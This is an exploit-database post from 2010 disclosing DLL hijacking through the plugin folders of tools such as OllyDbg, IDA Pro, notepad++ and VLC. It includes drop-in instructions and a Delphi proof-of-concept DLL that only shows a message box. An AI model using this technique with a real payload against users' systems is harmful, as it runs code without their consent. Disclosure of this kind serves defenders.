Plugins Dll Hijacking Exploit
Posted on 08 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Plugins Dll Hijacking Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================= Plugins Dll Hijacking Exploit ============================= Exploit Title: [Dll Hijacking Exploit] Application: [Application plugin support] Date: [07 Sept 2010] Author: [STRELiTZIA] Version: [%Applications list%] Tested on: [Windows Xp, Vista, Windows 7] Description: ------------ Allows other applications dynamic link libraries to execute malicious code without the users consent, in the privilege context of the targeted application. Download Test.dll link () Applications list: (Tested) ----------------- FastScanner ExeInfoPE Stud_PE PE Explorer OllyDbg IDA Pro (*.plw) notepad++ Hex Workshop Foxit Reader PhotoFiltre Studio X VLC Media player Import REConstructor PE Tools by NEOx DiE- DETECT iT EASY Instructions: ------------- 1- Copy "Test.dll" into "Application\%plugin%" Perform this tests: ------------------- - Launch Application. Test Dll Delphi Source: ---//--- Library Test; uses Windows; begin MessageBoxA ( 0, PChar('Yep, I''m running in your system without your permission :)'), PChar('Sample'), MB_ICONSTOP ); end. ---//--- c) 2010 by STRELiTZIA. # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-08]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>